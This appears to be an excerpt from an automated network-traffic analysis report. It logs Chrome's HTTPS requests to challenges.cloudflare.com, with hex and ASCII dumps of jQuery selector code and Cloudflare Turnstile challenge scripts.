                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 74 69 6f 6e 28 65 29 7b 76 61 72 20 6e 3d 65 2e 72 65 70 6c 61 63 65 28 74 65 2c 6e 65 29 3b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 26 26 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 4e 6f 64 65 28 22 69 64 22 29 3b 72 65 74 75 72 6e 20 74 26 26 74 2e 76 61 6c 75 65 3d 3d 3d 6e 7d 7d 2c 62 2e 66 69 6e 64 2e 49 44 3d 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 26 26 45 29 7b 76 61 72 20 6e 2c 72 2c 69 2c 6f 3d 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 65 29 3b 69 66 28 6f 29 7b 69 66 28 28
                                                                          Data Ascii: tion(e){var n=e.replace(te,ne);return function(e){var t="undefined"!=typeof e.getAttributeNode&&e.getAttributeNode("id");return t&&t.value===n}},b.find.ID=function(e,t){if("undefined"!=typeof t.getElementById&&E){var n,r,i,o=t.getElementById(e);if(o){if((
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 5b 22 2b 4d 2b 22 2a 6e 61 6d 65 22 2b 4d 2b 22 2a 3d 22 2b 4d 2b 22 2a 28 3f 3a 27 27 7c 5c 22 5c 22 29 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 3a 63 68 65 63 6b 65 64 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 3a 63 68 65 63 6b 65 64 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 61 23 22 2b 53 2b 22 2b 2a 22 29 2e 6c 65 6e 67 74 68 7c 7c 76 2e 70 75 73 68 28 22 2e 23 2e 2b 5b 2b 7e 5d 22 29 2c 65 2e 71 75 65 72 79 53 65 6c 65 63 74 6f 72 41 6c 6c 28 22 5c 5c 5c 66 22 29 2c 76 2e 70 75 73 68 28 22 5b 5c 5c 72 5c 5c 6e 5c 5c 66 5d 22 29 7d 29 2c 63 65 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 3c 61 20 68 72 65 66 3d 27 27 20 64 69 73 61 62 6c 65 64 3d 27
                                                                          Data Ascii: ["+M+"*name"+M+"*="+M+"*(?:''|\"\")"),e.querySelectorAll(":checked").length||v.push(":checked"),e.querySelectorAll("a#"+S+"+*").length||v.push(".#.+[+~]"),e.querySelectorAll("\\\f"),v.push("[\\r\\n\\f]")}),ce(function(e){e.innerHTML="<a href='' disabled='
                                                                          2024-10-01 22:42:49 UTC1378INData Raw: 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 2d 21 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 3b 72 65 74 75 72 6e 20 6e 7c 7c 28 31 26 28 6e 3d 28 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 65 29 3d 3d 28 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 7c 7c 74 29 3f 65 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 74 29 3a 31 29 7c 7c 21 64 2e 73 6f 72 74 44 65 74 61 63 68 65 64 26 26 74 2e 63 6f 6d 70 61 72 65 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70
                                                                          Data Ascii: e.compareDocumentPosition-!t.compareDocumentPosition;return n||(1&(n=(e.ownerDocument||e)==(t.ownerDocument||t)?e.compareDocumentPosition(t):1)||!d.sortDetached&&t.compareDocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          12192.168.2.649734104.18.95.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:49 UTC730OUTGET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=8cbff7d01962c33d&lang=auto HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                          sec-ch-ua-mobile: ?0
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          sec-ch-ua-platform: "Windows"
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: same-origin
                                                                          Sec-Fetch-Mode: no-cors
                                                                          Sec-Fetch-Dest: script
                                                                          Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/u972b/0x4AAAAAAAwgo_4sU4R7BlsA/auto/fbE/normal/auto/
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:49 UTC301INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:49 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 119995
                                                                          Connection: close
                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7d47d2a17b5-EWR
                                                                          2024-10-01 22:42:49 UTC1068INData Raw: 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 75 61 4f 3d 66 61 6c 73 65 3b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 2e 71 5a 4a 79 54 32 3d 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 63 68 61 6c 6c 65 6e 67 65 2e 74 65 72 6d 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 77 77 77 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 77 65 62 73 69 74 65 2d 74 65 72 6d 73 25 32 46 22 2c 22 63 68 61 6c 6c 65 6e 67 65 2e 73 75 70 70 6f 72 74 65 64 5f 62 72 6f 77 73 65 72 73 22 3a 22 68 74 74 70 73 25 33 41 25 32 46 25 32 46 64 65 76 65 6c 6f 70 65 72 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 25 32 46 66 75 6e 64 61 6d 65 6e 74 61 6c 73 25 32 46 67 65 74 2d 73 74 61 72 74 65 64 25 32 46 63 6f 6e 63 65 70 74 73 25 32 46 63
                                                                          Data Ascii: window._cf_chl_opt.uaO=false;window._cf_chl_opt.qZJyT2={"metadata":{"challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fc
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 43 68 65 63 6b 25 32 30 79 6f 75 72 25 32 30 49 6e 74 65 72 6e 65 74 25 32 30 63 6f 6e 6e 65 63 74 69 6f 6e 25 32 30 61 6e 64 25 32 30 25 33 43 61 25 32 30 63 6c 61 73 73 25 33 44 25 32 32 72 65 66 72 65 73 68 5f 6c 69 6e 6b 25 32 32 25 33 45 72 65 66 72 65 73 68 25 32 30 74 68 65 25 32 30 70 61 67 65 25 33 43 25 32 46 61 25 33 45 25 32 30 69 66 25 32 30 74 68 65 25 32 30 69 73 73 75 65 25 32 30 70 65 72 73 69 73 74 73 2e 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 69 66 72 61 6d 65 5f 61 6c 74 22 3a 22 57 69 64 67 65 74 25 32 30 63 6f 6e 74 61 69 6e 69 6e 67 25 32 30 61 25 32 30 43 6c 6f 75 64 66 6c 61 72 65 25 32 30 73 65 63 75 72 69 74 79 25 32 30 63 68 61 6c 6c 65 6e 67 65 22 2c 22 74 75 72 6e 73 74 69 6c 65 5f 6c 6f 6e 67 65 72 5f 74 68 61 6e 5f 65 78 70
                                                                          Data Ascii: Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","turnstile_longer_than_exp
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 61 72 73 65 49 6e 74 28 67 48 28 31 37 32 36 29 29 2f 31 31 29 2b 2d 70 61 72 73 65 49 6e 74 28 67 48 28 31 31 37 38 29 29 2f 31 32 2c 64 3d 3d 3d 66 29 62 72 65 61 6b 3b 65 6c 73 65 20 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 63 61 74 63 68 28 67 29 7b 65 2e 70 75 73 68 28 65 2e 73 68 69 66 74 28 29 29 7d 7d 28 61 2c 39 39 30 32 37 39 29 2c 65 4d 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 4e 3d 65 4d 5b 67 49 28 31 36 31 37 29 5d 2c 65 4d 5b 67 49 28 31 38 33 35 29 5d 3d 21 5b 5d 2c 65 4d 5b 67 49 28 35 32 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 32 29 7b 69 66 28 68 32 3d 67 49 2c 65 4d 5b 68 32 28 31 38 33 35 29 5d 29 72 65 74 75 72 6e 3b 65 4d 5b 68 32 28 31 38 33 35 29 5d 3d 21 21 5b 5d 7d 2c 65 55 3d 30 2c 65 4e 5b 67 49 28 31 37 35 34 29
                                                                          Data Ascii: arseInt(gH(1726))/11)+-parseInt(gH(1178))/12,d===f)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,990279),eM=this||self,eN=eM[gI(1617)],eM[gI(1835)]=![],eM[gI(523)]=function(h2){if(h2=gI,eM[h2(1835)])return;eM[h2(1835)]=!![]},eU=0,eN[gI(1754)
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 49 28 38 35 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 2c 68 6a 2c 6a 2c 6b 2c 6c 2c 6d 2c 6e 2c 6f 29 7b 66 6f 72 28 68 6a 3d 67 49 2c 6a 3d 7b 7d 2c 6a 5b 68 6a 28 31 30 34 37 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 73 2c 76 29 7b 72 65 74 75 72 6e 20 73 3c 76 7d 2c 6b 3d 6a 2c 6c 3d 4f 62 6a 65 63 74 5b 68 6a 28 31 36 32 33 29 5d 28 69 29 2c 6d 3d 30 3b 6d 3c 6c 5b 68 6a 28 31 33 34 38 29 5d 3b 6d 2b 2b 29 69 66 28 6e 3d 6c 5b 6d 5d 2c 27 66 27 3d 3d 3d 6e 26 26 28 6e 3d 27 4e 27 29 2c 68 5b 6e 5d 29 7b 66 6f 72 28 6f 3d 30 3b 6b 5b 68 6a 28 31 30 34 37 29 5d 28 6f 2c 69 5b 6c 5b 6d 5d 5d 5b 68 6a 28 31 33 34 38 29 5d 29 3b 2d 31 3d 3d 3d 68 5b 6e 5d 5b 68 6a 28 31 36 33 34 29 5d 28 69 5b 6c 5b 6d 5d 5d 5b 6f 5d 29 26 26 28 66 34 28 69 5b 6c 5b 6d 5d
                                                                          Data Ascii: I(853)]=function(h,i,hj,j,k,l,m,n,o){for(hj=gI,j={},j[hj(1047)]=function(s,v){return s<v},k=j,l=Object[hj(1623)](i),m=0;m<l[hj(1348)];m++)if(n=l[m],'f'===n&&(n='N'),h[n]){for(o=0;k[hj(1047)](o,i[l[m]][hj(1348)]);-1===h[n][hj(1634)](i[l[m]][o])&&(f4(i[l[m]
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 74 75 72 6e 20 68 3c 69 7d 2c 27 47 49 58 70 43 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 41 4c 66 48 78 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3c 3c 69 7d 2c 27 41 64 7a 4f 4e 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 3d 3d 68 7d 2c 27 72 41 4f 6d 6c 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 69 7c 68 7d 2c 27 4e 57 53 6b 72 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 28 69 29 7d 2c 27 6e 44 4b 74 6f 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 3d 3d 69 7d 2c 27 76 4b 72 76 66 27 3a 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2d 69 7d 2c 27 6e
                                                                          Data Ascii: turn h<i},'GIXpC':function(h,i){return h<<i},'ALfHx':function(h,i){return h<<i},'AdzON':function(h,i){return i==h},'rAOml':function(h,i){return i|h},'NWSkr':function(h,i){return h(i)},'nDKto':function(h,i){return h==i},'vKrvf':function(h,i){return h-i},'n
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 29 5d 28 31 33 37 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 71 28 31 31 32 35 29 5d 28 74 68 69 73 2e 68 5b 31 33 37 2e 36 38 5e 74 68 69 73 2e 67 5d 5b 30 5d 2b 2b 29 2c 32 35 35 29 29 5e 37 36 2e 34 32 2c 74 68 69 73 2e 67 29 5d 2c 54 3d 73 5b 68 71 28 31 37 33 34 29 5d 28 73 5b 68 71 28 31 32 32 34 29 5d 28 74 68 69 73 2e 68 5b 31 33 37 2e 39 35 5e 74 68 69 73 2e 67 5d 5b 33 5d 2c 33 38 2b 74 68 69 73 2e 68 5b 73 5b 68 71 28 31 37 33 34 29 5d 28 31 33 37 2c 74 68 69 73 2e 67 29 5d 5b 31 5d 5b 68 71 28 31 31 32 35 29 5d 28 74 68 69 73 2e 68 5b 73 5b 68 71 28 31 32 32 34 29 5d 28 31 33 37 2c 74 68 69 73 2e 67 29 5d 5b 30 5d 2b 2b 29 26 32 35 35 2e 37 39 29 2c 33 31 29 2c 55 3d 5b 6e 75 6c 6c 5d 2c 56 3d 30 3b 56 3c 54 3b 55 5b 68 71 28 37 32 31 29 5d 28
                                                                          Data Ascii: )](137,this.g)][1][hq(1125)](this.h[137.68^this.g][0]++),255))^76.42,this.g)],T=s[hq(1734)](s[hq(1224)](this.h[137.95^this.g][3],38+this.h[s[hq(1734)](137,this.g)][1][hq(1125)](this.h[s[hq(1224)](137,this.g)][0]++)&255.79),31),U=[null],V=0;V<T;U[hq(721)](
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 71 28 31 36 32 36 29 5d 28 4a 2c 64 5b 68 71 28 39 31 30 29 5d 28 6a 2c 31 29 29 3f 28 4a 3d 30 2c 48 5b 68 71 28 37 32 31 29 5d 28 6f 28 49 29 29 2c 49 3d 30 29 3a 4a 2b 2b 2c 50 3e 3e 3d 31 2c 78 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 42 5b 4d 5d 3d 46 2b 2b 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 30 3d 3d 45 26 26 28 45 3d 4d 61 74 68 5b 68 71 28 31 37 39 38 29 5d 28 32 2c 47 29 2c 47 2b 2b 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 45 2d 2d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 44 3d 53 74 72 69 6e 67 28 4c 29 3b 63 6f 6e 74 69 6e 75 65 7d 62 72 65 61 6b 7d 69 66 28 64 5b 68 71 28 39 30 34 29 5d 28 27 27 2c 44 29 29 7b 69 66 28 4f 62 6a 65 63 74 5b 68 71 28 31 35 37 39 29 5d 5b 68 71
                                                                          Data Ascii: q(1626)](J,d[hq(910)](j,1))?(J=0,H[hq(721)](o(I)),I=0):J++,P>>=1,x++);continue;case'1':B[M]=F++;continue;case'2':0==E&&(E=Math[hq(1798)](2,G),G++);continue;case'3':E--;continue;case'4':D=String(L);continue}break}if(d[hq(904)]('',D)){if(Object[hq(1579)][hq
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 73 5b 45 5d 3d 45 2c 45 2b 3d 31 29 3b 66 6f 72 28 4a 3d 30 2c 4b 3d 4d 61 74 68 5b 68 74 28 31 37 39 38 29 5d 28 32 2c 32 29 2c 46 3d 31 3b 4b 21 3d 46 3b 29 66 6f 72 28 4c 3d 68 74 28 31 33 38 38 29 5b 68 74 28 31 36 33 35 29 5d 28 27 7c 27 29 2c 4d 3d 30 3b 21 21 5b 5d 3b 29 7b 73 77 69 74 63 68 28 4c 5b 4d 2b 2b 5d 29 7b 63 61 73 65 27 30 27 3a 30 3d 3d 48 26 26 28 48 3d 6a 2c 47 3d 64 5b 68 74 28 31 38 37 39 29 5d 28 6f 2c 49 2b 2b 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 31 27 3a 4a 7c 3d 28 64 5b 68 74 28 35 31 35 29 5d 28 30 2c 4e 29 3f 31 3a 30 29 2a 46 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 48 3e 3e 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 46 3c 3c 3d 31 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34
                                                                          Data Ascii: s[E]=E,E+=1);for(J=0,K=Math[ht(1798)](2,2),F=1;K!=F;)for(L=ht(1388)[ht(1635)]('|'),M=0;!![];){switch(L[M++]){case'0':0==H&&(H=j,G=d[ht(1879)](o,I++));continue;case'1':J|=(d[ht(515)](0,N)?1:0)*F;continue;case'2':H>>=1;continue;case'3':F<<=1;continue;case'4
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 68 74 28 31 34 32 36 29 5d 28 30 29 29 2c 78 2d 2d 2c 45 3d 4f 2c 78 3d 3d 30 26 26 28 78 3d 4d 61 74 68 5b 68 74 28 31 37 39 38 29 5d 28 32 2c 43 29 2c 43 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 68 6d 28 37 37 38 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 65 4d 5b 67 49 28 37 30 30 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 75 2c 64 2c 65 2c 66 2c 67 29 7b 68 75 3d 67 49 2c 64 3d 7b 7d 2c 64 5b 68 75 28 37 30 31 29 5d 3d 68 75 28 34 39 34 29 2c 64 5b 68 75 28 34 37 34 29 5d 3d 68 75 28 35 37 34 29 2c 64 5b 68 75 28 31 36 30 32 29 5d 3d 68 75 28 34 30 38 29 2c 64 5b 68 75 28 31 30 36 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72 6e 20 68 2a 69 7d 2c 64 5b 68 75 28 31 31 30 33 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 68 2c 69 29 7b 72 65 74 75 72
                                                                          Data Ascii: ht(1426)](0)),x--,E=O,x==0&&(x=Math[ht(1798)](2,C),C++)}}},g={},g[hm(778)]=f.h,g}(),eM[gI(700)]=function(hu,d,e,f,g){hu=gI,d={},d[hu(701)]=hu(494),d[hu(474)]=hu(574),d[hu(1602)]=hu(408),d[hu(1061)]=function(h,i){return h*i},d[hu(1103)]=function(h,i){retur
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 2b 27 2f 27 2b 65 4d 5b 68 77 28 37 30 33 29 5d 5b 68 77 28 31 38 37 33 29 5d 2c 27 2f 27 29 2b 65 4d 5b 68 77 28 37 30 33 29 5d 5b 68 77 28 31 38 32 38 29 5d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 32 27 3a 43 5b 68 77 28 31 36 38 34 29 5d 28 6b 5b 68 77 28 39 32 34 29 5d 2c 68 77 28 31 30 34 36 29 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 33 27 3a 43 5b 68 77 28 31 33 37 33 29 5d 28 27 76 5f 27 2b 65 4d 5b 68 77 28 37 30 33 29 5d 5b 68 77 28 38 35 32 29 5d 2b 27 3d 27 2b 46 29 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 34 27 3a 43 5b 68 77 28 31 30 31 36 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 3b 63 6f 6e 74 69 6e 75 65 3b 63 61 73 65 27 35 27 3a 42 3d 28 78 3d 7b 7d 2c 78 5b 68 77 28 39 38 31 29 5d 3d 67 2c 78 2e 63 63 3d 68 2c 78 5b
                                                                          Data Ascii: +'/'+eM[hw(703)][hw(1873)],'/')+eM[hw(703)][hw(1828)];continue;case'2':C[hw(1684)](k[hw(924)],hw(1046));continue;case'3':C[hw(1373)]('v_'+eM[hw(703)][hw(852)]+'='+F);continue;case'4':C[hw(1016)]=function(){};continue;case'5':B=(x={},x[hw(981)]=g,x.cc=h,x[


                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                          13192.168.2.649735104.18.94.414434864C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          TimestampBytes transferredDirectionData
                                                                          2024-10-01 22:42:49 UTC383OUTGET /turnstile/v0/g/ec4b873d446c/api.js HTTP/1.1
                                                                          Host: challenges.cloudflare.com
                                                                          Connection: keep-alive
                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                          Accept: */*
                                                                          Sec-Fetch-Site: none
                                                                          Sec-Fetch-Mode: cors
                                                                          Sec-Fetch-Dest: empty
                                                                          Accept-Encoding: gzip, deflate, br
                                                                          Accept-Language: en-US,en;q=0.9
                                                                          2024-10-01 22:42:49 UTC441INHTTP/1.1 200 OK
                                                                          Date: Tue, 01 Oct 2024 22:42:49 GMT
                                                                          Content-Type: application/javascript; charset=UTF-8
                                                                          Content-Length: 47262
                                                                          Connection: close
                                                                          accept-ranges: bytes
                                                                          last-modified: Tue, 17 Sep 2024 16:06:37 GMT
                                                                          cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                          access-control-allow-origin: *
                                                                          cross-origin-resource-policy: cross-origin
                                                                          Server: cloudflare
                                                                          CF-RAY: 8cbff7d4a925423b-EWR
                                                                          2024-10-01 22:42:49 UTC928INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 56 74 28 65 2c 72 2c 61 2c 6f 2c 63 2c 6c 2c 67 29 7b 74 72 79 7b 76 61 72 20 66 3d 65 5b 6c 5d 28 67 29 2c 70 3d 66 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 73 29 7b 61 28 73 29 3b 72 65 74 75 72 6e 7d 66 2e 64 6f 6e 65 3f 72 28 70 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 70 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 57 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 61 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 6c 3d 65 2e 61 70 70 6c 79 28 72 2c 61 29 3b 66 75 6e 63 74
                                                                          Data Ascii: "use strict";(function(){function Vt(e,r,a,o,c,l,g){try{var f=e[l](g),p=f.value}catch(s){a(s);return}f.done?r(p):Promise.resolve(p).then(o,c)}function Wt(e){return function(){var r=this,a=arguments;return new Promise(function(o,c){var l=e.apply(r,a);funct
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 61 2e 70 75 73 68 2e 61 70 70 6c 79 28 61 2c 6f 29 7d 72 65 74 75 72 6e 20 61 7d 66 75 6e 63 74 69 6f 6e 20 74 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75 6c 6c 3f 72 3a 7b 7d 2c 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44
                                                                          Data Ascii: ct.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),a.push.apply(a,o)}return a}function tt(e,r){return r=r!=null?r:{},Object.getOwnPropertyD
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 48 74 28 65 29 7c 7c 42 74 28 65 2c 72 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 6a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 50 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 44 65 28 65 2c 72 29 7b 76 61 72 20 61 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 6c 5b 30 5d 26 31 29 74 68 72 6f 77 20 6c 5b 31 5d 3b 72 65 74 75 72 6e 20 6c 5b 31 5d 7d 2c 74 72
                                                                          Data Ascii: function Ae(e,r){return Ht(e)||Bt(e,r)||qt(e,r)||jt()}function P(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function De(e,r){var a={label:0,sent:function(){if(l[0]&1)throw l[1];return l[1]},tr
                                                                          2024-10-01 22:42:49 UTC1369INData Raw: 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 47 74 3d 33 30 30 30 32 30 3b 76 61 72 20 50 65 3d 33 30 30 30 33 30 3b 76 61 72 20 55 65 3d 33 30 30 30 33 31 3b 76 61 72 20 71 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4d 41 4e 41 47 45 44 3d 22 6d 61 6e 61 67 65 64 22 2c
                                                                          Data Ascii: oaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Gt=300020;var Pe=300030;var Ue=300031;var q;(function(e){e.MANAGED="managed",
